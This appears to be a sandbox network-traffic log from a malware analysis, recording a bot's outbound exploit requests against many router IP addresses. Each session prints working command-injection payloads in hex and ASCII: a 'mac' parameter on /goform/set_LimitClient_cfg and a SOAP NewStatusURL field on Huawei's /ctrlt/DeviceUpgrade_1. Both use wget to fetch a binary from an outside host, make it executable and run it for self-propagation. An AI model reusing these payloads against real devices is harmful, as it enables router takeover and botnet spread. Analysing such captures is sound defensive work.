                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2792192.168.2.2351560176.72.14.558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.517718077 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2793192.168.2.235687684.20.21.1448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.517751932 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2794192.168.2.233483674.89.74.1848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.517766953 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2795192.168.2.2333638107.229.228.1738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.517852068 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2796192.168.2.2355276141.164.148.358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.517852068 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2797192.168.2.2350980130.192.247.24237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.644117117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2798192.168.2.2354980145.78.200.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.644133091 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2799192.168.2.233621841.74.11.6537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649312973 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2800192.168.2.2350756157.41.146.7937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649328947 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2801192.168.2.2339168157.143.248.21637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649342060 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2802192.168.2.235329041.49.233.5737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649342060 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2803192.168.2.2342790157.236.147.2137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649378061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2804192.168.2.233428641.130.188.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649379969 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 